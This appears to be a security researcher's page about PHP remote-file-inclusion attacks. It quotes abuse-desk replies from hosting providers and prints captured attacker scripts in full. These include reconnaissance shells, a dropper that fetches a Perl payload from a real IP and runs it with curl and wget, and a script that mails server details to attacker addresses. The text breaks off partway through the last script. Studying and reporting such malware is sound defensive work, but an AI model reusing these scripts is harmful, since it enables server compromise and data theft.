Trying to clean the Web since August 2001...
2010-03-04 : Fx29, Fx29ID, FX29SHEXEC files (usually fx29id2.php)
04/09/2008 update
| Customer has been informed and the site has been taken offline. Thank you for reporting this issue. Wij vertrouwen erop u hiermee voldoende te hebben geďnformeerd. | Dennis Koster Manager Linux Hosting Solutions Denit Hosting Solutions support@denit.nl 30/05/2008 10:23 |
| Hello, Thank you very much for the information. I have terminated the site immediately. [...]The account has been blocked. Thank you for the assistance in this matter. Best Regards, | Syman / Kevin J. 100webspace.com support@100webspace.com 31/05/2008 09:13 / 28/08/2008 |
| account suspended, thanks :-) Best Regards | Gary DELOBEL Support EBSD EBSD - Hébergement Web gary.delobel@ebsd.net 31/05/2008 10:49 |
| Dear, Our customer have been informed and will take appropiate action. With kind regards, | Tymen Fox CTO TrancePitt Internet info@trancepitt.com 31/05/2008 16:03 |
| Hi, The issue has been taken care of and we removed some malicious script from the server. Thank you for notifying the same. Regards, | Ashok Slash Support.com mi-globatsupport@slashsupport.com 24/05/2008 16:56 |
| Hello! Thank you for your report. We will make all appropriate steps to prevent this attaks. Please, feel free to notify us in future. | Evgeny Fadeev Support Division "Demos-Internet" abuse@demos.ru 03/06/2008 11:14 |
| Dear Sir or Madam, Thank you for your Message! We have contacted our customer, and informed him about this security issue so that he can fix it. with best regards, | UPC Abuse Team. UPC Austria Ges.m.b.H. abuse@upc.at 03/06/2008 12:53 |
| Greetings, The administrator of these dedicated server has been warned and is curently working to solve this problem. Regards, | -- Nicolas LAFONT SIVIT Sarl | Hébergement internet - Transit IP http://sivit.fr 03/06/2008 13:05 |
| Hello, This user has been issued a 1h warning to stop the offending actions. [...] This user's server has been suspended. Thank you for this report, we appreciate the cooperation. Let us know if we can do anything else. | Toni A. HostForWeb Support abuse@hostforweb.com 04/06/2008 08:35 / 26/08/2008 |
| Yes, some dork abused a php-website. We have killed the processes and informed the customer. [...] There was a hacked website on this server. The page was fixed on the 6.6.2008. If you still see attacks please report again. | Nine Internet Solutions AG abuse@nine.ch 06/06/2008 10:42 |
| Hi, We taking care of it right now. We already took action yesterday. Let us know if you the attack persists or repeats. Thank you for reporting this situation. | abuse@73dpi.com 06/06/2008 15:38 |
| Dear Sir, we will try our best to find out the responsible of the abuse. Thanks for your help. [...] Dear Sir, I have supplied to admonish the responsible to inviting to devout a correcting use of the Internet resources. Thank you for your collaboration in notifying us the abuse. [...]your report was registered, due disciplinary measures about our customer are on the way. Meanwhile, please accept our apology for Your trouble. Best Regards | Servizio Abuse Tiscali Tiscali Italia S.p.A. [alice.it] abuse@tiscali.it 06/06/2008 07:24 / 23/07/2008 |
| Hi, Thanks for contacting us, We've informed the server owner and necessary actions will be taken to avoid this to happen. Best Regards, | Milind P Support Technician II Defender Technologies Group, LLC./PowerVPS Support abuse@defenderhosting.com 07/06/2008 07:13 |
| Dear Sir / Madam! We are now investigating this incident and will do our best to prevent any future abuse of this kind from our network. We are always ready to stop any abuse so please do not hesitate to contact us if any additional assistance is ever required. Thank you for cooperation! | .masterhost.ru abuse@masterhost.ru 11/06/2008 02:11 |
| This matter will be resolved with our customer. Thanks for the information. Best regards, -- Met vriendelijke groet, | Remko Kleijkers Network Engineer - Unilogic Networks B.V. abuse@unilogicnetworks.net 12/06/2008 09:09 |
| Greetings, We are looking into this issue and trying to find the culprit. It is a shared webserver so it might take us a while to sort through the non malicious content. But rest assured. We are working on it. Mvh | Mats Webcows Backoffice abuse@dependit.se 13/06/2008 20:59 |
| You should not see any more of these. Please let us know if you do. | Chris Jackman RCN Internet Systems Abuse Desk abuse@rcn.com 13/06/2008 23:08 |
| We have made the servers unavailable to the public, and are working with our client to resolve. Thanks for reaching out. | Gregg Kitaeff VP of Sales Logicworks gk@logicworks.net 16/06/2008 17:30 |
| Hi Thank you for your email. We have investigated the compromised server and identified and corrected the exploited script. We have identified a number of third party servers which were used to stage the original attack against one of our customers' sites and are in the process of reporting this abuse to their owners. Thank you again for bringing this to our attention. Regards | opendium.net (HOSTIT-KCOM) h.mills@opendium.com 19/06/2008 10:45 |
| Dear Sir / Madam, Thank you for writing into us. The server in question has been disabled. Thank you for your information. [...] Thank you for writing into us. We have disabled the IP address 91.186.1.118. Do let us know if we can help you more. Regards, | Nick G Chief Quality Analyst http://eukhost.com 20/06/2008 04:05 |
| Hi, Thanks for your email letting us know of the issue. I have now taken the machine in question offline and passed the issue to colleagues. I hope this hasn't been too much of an issue for you. [...] I have forwarded this matter on to the relevant parties and they tell me that the server in question has been taken offline pending an investigation and as such, this attack should have stopped.[...] To all concerned; I belive we have traced the cause of this issue to an out of date Vbulletin installation which has now been patched. The server has been scanned for root-kits and other nasties and appears to be clean. Please do let us know if you receive any more attacks from our server and we will investigate it further. Regards, | rich@genericlan.net abuse@racksrv.net 21/06/2008 13:03 |
| Hello! I removed this site. Regards. | Bordák János info@ingyenweb.hu (pokol.hu) 21/06/2008 19:01 |
| Hello, The client has been issued an abuse notice. When he replies, we will check the security on his VPS and resolve this situation. If we don't hear from him soon, the server will be suspended. Let us know if you have further questions. [...] Greetings I have suspended the account, and it will not be activated again until the bot has been removed and the out dated/exploitable script has been removed from the server. Thanks, [...] Best regards, | Zlatko D. / Nathan S. HostForWeb Support / Level 2 Support abuse@hostforweb.com 23/06/2008 09:14 / 22/07/2008 |
| Hello, thank you for the information. We have informed our customer about this security issue. Best regards from germany. | Customer Care [netclusive] internet broadcasting GmbH support@netclusive.de 23/06/2008 16:26 |
| Dear Sir, we have taken measures against these attacks. Thank you for your warning. regards, | Mustafa Aldemir m_aldemir@tilda.com.tr [for http://www.bes.org.tr] 26/06/2008 10:20 |
| Thank's, The source of the attack was an exploit on the site forums.svucrib.com. The site has been removed. Feel free to remove our IP from your firewall. Regards, | Jarrad Piper Big Button Internet. sysadmin@bigbutton.com.au 26/06/2008 10:14 |
| Hi, We have removed the malicious script found in the server and also removed the infected php scripts from your domain. Please feel free to contact for further assistance. kind regards, | Neil support@mdwebhosting.com.au [CC:abuse@dichotomy.com.au] MD Web Hosting 27/06/2008 04:04 |
| Hello, Thank you for reporting this abuse. We have removed the account responsible. | Spry Abuse Team abuse@spry.com 01/07/2008 07:35 |
| Good This issue is under investigation | Gustavo Tayupo. Analista Departamento de Soporte Tecnico. Private IP Services, C.A. abuse@iguanahosting.com [CC:abuse@PRIVATEIPSERVICES.COM] 29/06/2008 18:10 |
| Thanks for reporting this issue. We are looking into this together with the customer of this server. | Kristian -- Kristian H. DataGuard AbuseTeam abuse@dataguard.no 02/07/2008 10:12 |
| Hello, the malware script has been killed and deleted so the attack should stopped. Regards, | Abuse Team Hostalia Internet www.hostalia.com abuse@hostalia.com [CC:abuse@globalcare.or.kr] 03/07/2008 10:14 |
| Hello, Thanks for the head's up! The offending account (redsraiders.com, hosting the file for injection) has been deactivated, pending review. If we can be of further assistance, please do not hesitate to ask. | Cade Ekblad-Frank Level 3 Support Bluehost.com abuse@bluehost.com 06/07/2008 19:28 |
| Hello, I ahve forwarded this to our customer to investigate the server. As a company who sells dedicated rootservers we cant do this ourself. To stop the attacks I have now blocked this IP on our side until the issue is solved. Mit freundlichen Grüßen / Best regards | Kai Doelter netdirekt e. K. Germany info@netdirekt.de 11/07/2008 08:57 |
| ????????????! Thank you for information. Account blocked [...]the attack source has been blocked ? ?????????, ???????? ?????? | abuse@hc.ru [for s15219733.onlinehome-server.info] 11/07/2008 12:23 / 23/07/2008 |
| Account removed. | T35 Hosting, Inc. http://www.t35.com 15/07/2008 04:17 |
| Hello, we should now have stopped the Attacks from our Server. Could you agree with it? | roquette@speedbone.de [for prosite.de (DE-SPEEDBONE-217-13-199#0-63)] 16/07/2008 21:47 |
| Dear Sirs The specified users and their content where disabled as requested. Att. | Carlos Arce *@xpg.com.br [for http://avast4ever.xpg.com.br] Xpg Extreme WebHosting 18/07/2008 17:51 |
| The EC2 customer says he has secured his instance from hackers by applying a security patch. You should no longer see any further attacks from 75.101.157.249. If you do see any more attacks, please let me know. Thanks, | Marty Amazon AWS EC2 Abuse ec2-abuse@amazon.com 22/07/2008 20:20 |
| Hello, I have addressed this for now and found the site causing these problems on the server. Thank you for letting us know about this, we appreciate the heads up any time someone is willing to inform us of this type of behavior. Please let us know if you have any additional questions or concerns. | Michael Piekarski http://www.HostMySite.com support@HostMySite.com 24/07/2008 04:30 |
| Thank you for your signal. Our user has been strongly warned. Account (www.printunion.ru, IP 217.23.156.220) temporarily blocked until we investigate deviant activity our user. | Oleg Goryun support@caravan.ru [for printunion.ru (CARAVAN-HOSTING-NET-4)] 31/07/2008 19:00 |
| Thanks, your email helped us to find a neglected server, which was abused by romanian hacker. I hope we have stopped him. | Josef Liska jl@chl.cz [for 193.85.215.9 (CHL-POCITACE-CZ)] 25/08/2008 13:09 |
| Hello, Thank you for contacting us about this issue. I've located the customer on the server whos site appears to have been exploited, and they should be upgrading their software shortly. As a security measure, I've blocked calls to id.txt and agent libperl-www from this server, as we have this blocked already on other servers. Note that this can still allow the hack attempts to be executed, but they will not be successful. If you see further attempts like this, pay attention to the error code reflected in the logs to see if it is a '406' or '403' status, which indicates that the attempt was made but blocked by our server. Thanks, | Vanessa InMotion Hosting System Administration abuse@inmotionhosting.com 24/05/2008 18:38 |
| Hello, We have implemented a block within our firewall ruleset to prevent this attack. If we can be of more assistance, please contact us. Thank you | Anthony K W. abuse@ecommerce.com [for opentransfer.com (ECOMMERCE-HOSTING)] 31/08/2008 04:51 |
| Dear security@edainworks.com, We wish to thank you for your message in which you informed us about an incident with our Internet service. This IP Address (202.6.233.40 - cherry.padinet.com) is one of our Hosting Servers. Most likely what occurred here is one of our customer with an outdated PHP script installation was exploited and their account was used to run these hack attempts. Now the problem has been resolved, I have killed any abnormal processes and additionally scanned server for viruses and removed all infected files. I also checked the server for any potential exploit processes and didn't find any running at the moment. If you have any further issues with this IP address please let us know and we'll look further into the matter. Best Regards, | PadiNET Hostmaster hostmaster@padinet.com 03/09/2008 |
| Dear Sir or Madam, We hereby inform you that the complaint you submitted to us for “hacking” has been handled by our services. Practically this means that should the abuser be a Belgacom customer, he/she would then be requested to certifying he/she will stop committing such abuses. And should this person go against our terms again, more serious actions would then be taken. Do not hesitate to contact us for questions or problems regarding our competences. Yours truly, | Internet Fraud Team INS/SEC BELGACOM [for .adsl-static.isp.belgacom.be] abuse@skynet.be 03/09/2008 |
| The Terra Abuse Department have the constant preocupation of keep a safe and friendly network. We appreciate your effords in helping us to fight against the bad use of the Internet through the Terra servers. About your claim, the refered improper content was removed and the responsible for disponibilizing it at the "Páginas Pessoais" was identified as a TERRA ISP USER and had its services SUSPENDED. We point out that this user will be guided about the norms of security and good behavior at the Internet utilization and, in case of a relapse occurs, the contract will be finished. | Emerson Rocha Terra Networks Brazil S/A abuse@terra.com.br Abuse Department - Security Team 24/05/2008 18:38 |
| Hello, No, its not an error. Sadly, you are correct. That is our IP address, and the server that it belongs to was compromised. We became aware of this last week, and the problem *should* have been resolved by now. When was the last attempt that you saw coming from this server? | Ian Lindsay Technical Support Technician CrystalTech Web Hosting, Inc. A Newtek Business Services Company URL: http://www.crystaltech.com 24/05/2008 09:50 |
| Hello, This is one of our shared servers. Most likely what occurred here is a customer with an outdated PHP script installation was exploited and their account was used to run these hack attempts. We usually catch these within a few hours of the time the account was exploited, however, so this issue should not still be occurring. I also checked the server for any potential exploit processes and didn't find any running at the moment. If you have any further issues with this IP address please let us know and we'll look further into the matter. Thank You! | Dragos Gabriel Fedorovici JSA I - System Administrator Team support@lunarpages.com 24/05/2008 09:22 |
| Good the problem has been resolved, safety rules were added to the server Apache to counter this type of attack. additionally is the server scanning for viruses and removed all infected files. thanks by colaboration | Gustavo Tayupo. Analista Departamento de Soporte Tecnico. Private IP Services, C.A. Headquarter:CC Plaza Mayor Local 6B229 23/05/2008 16:12 |
| Dear sir: We wish to thank you for your message in which you informed us about an incident with our Internet service. In addition, we would like to inform you that we are taking measures to approach the problem in order to prevent it from happening again in the future. We are grateful for your message, and we remember you that you can contact with us at email nemesys@telefonica.es or abuse@telefonica.net | I. Martinez Nemesys Abuse Team rima-tde.net Admin Group Telefónica De Espańa 21/05/2008 20:17 |
| Thank you for your Message! We have contacted our customer, and informed him about this security issue so that he can fix it. with best regards, UPC Abuse Team. | UPC Austria Ges.m.b.H. Center Ost, St.Peter Guertel 10b A-8042 Graz U: http://www.upc.at E: abuse@upc.at 21/05/2008 11:58 |
| We suspended account running such software and we will investigate this problem with his owner. Regards, | Maciej Tomaszewski biuro@xon.pl 19/05/2008 14:47 |
| Thank you for information. User has been warned and informed about the situation. | marlena.niezorawska@superhost.pl 19/05/2008 09:24 |
| Dear Sir, Thank you for your message. I can confirm that a user account on this server was indeed compromised and was implicated in this attack. We are currently cleaning up the machine and identifying the vulnerability so any future recurrence can be avoided. Thanks again for bringing this to our attention. Cheers, | Maarten Daemon.be 18/05/2008 19:13 |
| Thanks, we'll look in to it. Someone probably has a vulnerable PHP app on their site we'll track down. Thank you, | Jen Hostasaurus Support support@hostasaurus.com 17/05/2008 17:30 |
| Thank you, this account has been terminated. Jamie | help@ripside.com 13/05/2008 16:03 |
| Prezado(s) Senhor(es), Os cadastros/servi=E7os dos usu=E1rios em quest=E3o foram desativados. Atenciosamente, | Carlos Arce carce@xpg.com.br Xpg Extreme WebHosting Tue, 13 May 2008 01:17:00 +0200 |
| Hi, e made a killing processes abnormal. thank you for reporting Rimaniamo a disposizione per ulteriori chiarimenti. Cordiali Saluti | Christian Cantinelli Technical Senior Engineer Serverplan Srl - supporto@serverplan.com 12/05/2008 10:27 |
| Hello, We have located a few Perl scripts inside the reseller hosting account. They have been locked down. Can you check and let us know if you see any more of such attacks from our server ? We apologize for the inconvenience caused. -- Thank You | Swapneel Patnekar Senior Systems Engineer http://www.networkredux.com 10/05/2008 22:58 |
| Hello, Thank you for notifying us of this. I've forwarded your email to our customer to have him take a look into this. It doesn't appear to be him that is trying to hack your server, but rather a third party exploiting a security problem in his site. We will follow up with him to see that this issue is resolved and doesn't happen again. Thank you, | Vanessa InMotion Hosting vanessav@inmotionhosting.com 10/05/2008 20:21 |
| Hello, we blocked this host, thanks for your report. | support@caravan.ru 10/05/2008 19:47 |
| Sehr geehrte Damen und Herren, vielen Dank fuer die Informationen. Wir haben umgehend mit unserem Kunden Kontakt aufgenommen und ihn darum gebeten, sich um das Problem zu kuemmern. Falls Sie nochmal Probleme mit dieser IP bzw. diesem Server haben, bitte ich Sie, sich einfach nochmals kurz zu melden. Bitte entschuldigen Sie die Unannehmlichkeiten. Mit freundlichen Grüßen | Julian Weinberger Hetzner Online AG Stuttgarter Straße 1 91710 Gunzenhausen Tel: 09831 61006-1 Fax: 09831 61006-2 julian.weinberger@hetzner.de http://www.hetzner.de 08/05/2008 09:55 |
| Dear Sir, we will try our best to find out the responsible of the abuse. Thanks for your help. Best Regards Cordiali Saluti | Servizio Abuse Tiscali Tiscali Italia S.p.A. abuse@tiscali.it 05/05/2008 18:08 |
| Het is net andersom, jullie server heeft HTTP requests gedaan op www.europeanexperts.org en *****_utilities.php. Net alsof er iemand met een browser vanaf jullie server websites heeft lopen bekijken. Gezien dit een linux/freebsd server is, het is 99.99% van de keer een proces dat op de server draait dat erop is gezet door een hack. Deze melding geeft dus aan dat je server waarschijnlijk gehacked is. -- Met vriendelijke groet, | Martijn Smit ProServe B.V. Nieuwlandparc 155 3351 LJ Papendrecht Postbus 363 2950 AJ Alblasserdam Tel: 078 692 2222 Fax: 078 692 2269 http://www.proserve.nl 05/05/2008 11:14 |
| DALnet has now disabled this channels website. | ahnberg@dal.net 05/05/2008 08:33 |
| Hello, The DL00*** machine is a machine rented by one of our customers. We temporarily disabled their account until they will get back to us and clarify these security concerns. Masoch is a production server with few hundreds of accounts so tracking the account with that problem takes a bit more time. We found few exploited accounts on that machine and secured them and we will continue looking over this. Thank you for bringing these important notes into our attention. Have a good day ! | Florin - Iulian Asavoaie System Admin Team support@lunarpages.com 02/05/2008 21:54 |
| Hello! I remocev this site. | Bordák János info@ingyenweb.hu 02/05/2008 14:27 |
| Hello, Thank you for informing us about the attacks. We found the vulnurable site and closed it. ( Very old version of PHP-Nuke :( ) Best Regards. | Goktug OZTURK 2008/5/2 InternetSahibi.Net Int. mail@internetsahibi.net hostum@hostum.net 02/05/2008 13:24 |
| We did some traces on appserv and the ips you gave us and happened upon some files in /tmp that were owned by the exploited website. We looked into that website and found an old version of Acal (calendar program) which had a perl script within it that was connecting to IRC and seemed heavily optimized toward searching a variety of popular web search engines and giving the results back through an IRC interface. We chmod'd 000 that dir and alerted the website owner they need to update their Acal software. Once again, thank you for the heads up. Thanks, | Dave Carnahan ZeroLag Communications E-mail: support@zerolag.com Web: http://www.zerolag.com/ 30/04/2008 22:09 |
| The Tripod account you have brought to the attention of the Lycos Network Abuse Department was found to be in violation of our Terms and Conditions. As a result, it has been removed from our servers. Thank you for reporting it to us. | Bill Customer Service Lycos Services. support@support.lycos.com 28/04/2008 16:42 |
| Hi, We have forwarded this abuse report to our downstream, we will wait for their response and keep you updated. Thank you. Regards, | Mike C. PIRADIUS NETWORK C-G-19, SME Technopreneur Center Cyberjaya 2270 Jalan Usahawan 2 63000 Cyberjaya Selangor, Malaysia Email: abuse@piradius.net Website: http://www.piradius.net 28/04/2008 11:28 |
AForum "CommonAbsDir" like in GET /common/func.php?CommonAbsDir=http://ontheribbon.com/micro_cms_files/images/id.txt (see 09/05/2007 Advisory)Rgboard 'bbs.lib.inc.php' like in GET /include/bbs.lib.inc.php?site_path=http://lnx.padellino.com/prc.gif (see 14/05/2008 Advisory)PHProjekt "path_pre"/"lib_path" like in GET /create.php?path_pre=http://www.itm16.com/themes/id.txt (see 16/08/2006 Advisory)Microsoft's SQuery "libpath" (see 03/04/2006 Advisory)more particularly, Microsoft's SQuery gore.php libpath, like in GET /SQuery/lib/gore.php?libpath=http://tb4fun.t35.com/id.gif (see 01/04/2006 Advisory)| 2010-03-04 : Fx29 |
<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o); $rez = join("
",$o); }
elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096); } pclose($h); }
else { $rez = "Error!"; }
return $rez;
}
function vsize($size) {
if (!is_numeric($size)) { return FALSE; }
else {
if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
else { $size = $size . " B"; }
return $size;
}
}
function hdd($type) {
$P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];
}
die("FeeLCoMz");
?>
That script isn't even correctly coded (see the final U=T-U in stead of U=T-F ;-))and it outputs not very interesting server stuff but it can be an annoyance to divulgate those data to a remote attacker ;-) Here's the output : ID: FeeLCoMz SAFE: OFF OS: WINNT UNAME: Windows NT ***somename*** 5.1 build 2600 SERVER: 127.0.0.1 USER: SYSTEM UID: uid=0 gid=0 DIR: ***somedir*** PERM: [W] HDD: Used: 4.01 GB Free: 1.26 GB Total: 4.01 GB DISFUNC: FeeLCoMz |
| arab.txt |
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
|
| nid.txt |
<?
$dir = @getcwd();
$ker = @php_uname();
echo "31337<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
|
| cmdAsc.txt |
<?
/*******************************************\
IRC.ASCNET.BIZ
http://www.asc.sh/
ALBOSS PARADISE aka ASCRIMEZ aka ASCNET aka ASC aka ALBANIAN.SECURITY.CLAN
\*******************************************/
$x16="get_current_user"; //unobfuscated : $x16="get_current_user";
$x17="getcwd"; // $x17="getcwd";
$x18="getenv"; // $x18="getenv";
$x19="gethostbyname"; // $x19="gethostbyname";
$x1a="php_uname"; // $x1a="php_uname";
$x1b="phpversion"; // $x1b="phpversion";
$x1c="system"; // $x1c="system";
echo "ALBANIA<br>"; // echo "ALBANIA<br>";
$x0b = @$x1a();
$x0c = $x1c(uptime);
$x0d = $x1c(id);
$x0e = @$x17();
$x0f = $x18("SERVER_SOFTWARE"); // $x0f = $x18("SERVER_SOFTWARE");
$x10 = $x1b();
$x11 = $_SERVER['SERVER_NAME'];
$x12 = $x19($x13);
$x14 = $x16();
$x15 = @PHP_OS;
echo "os: $x15
|
| oldbisok.txt |
<?php
echo exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo system('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo shell_exec('cd /tmp;curl -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo system('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
echo shell_exec('cd /tmp;wget -o l ftp://77.91.227.68/upload/tmp/1422423437/24224234310/2;perl l;rm -f l*;');
?>
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}}
exit;
|
| sistem.txt |
<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>
|
| id2.txt |
<?php
$dir = @getcwd();
$ker = @php_uname();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto1 = "atividade-off";
$assunto2 = "atividade-on";
$email1 = "bstraq@yahoo.com";
$email2 = "rocks.bsnet@yahoo.com";
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF");
if(mail($email1, $assunto1, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "<br>Opa, enviado! bstraq@yahoo.com<br>";
}
if(mail($email2, $assunto1, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "<br>Opa, enviado! rocks.bsnet@yahoo.com<br>";
}
} else{ ini_restore("safe_mode"); ini_restore("open_basedir"); if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe Mode of this Server is : "); echo("SafemodeOFF");
}else{ echo("Safe Mode of this Server is : "); echo("SafemodeON");
if(mail($email1, $assunto2, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "<br>Opa, enviado! bstraq@yahoo.com<br>";
}
if(mail($email2, $assunto2, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "<br>Opa, enviado! rocks.bsnet@yahoo.com<br>";
}
} }
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if (function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif ( function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif (function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif (@is_resource($f = @popen($cfe,"r"))) {
$res = "";
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
exit;
|
| safeon.txt |
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
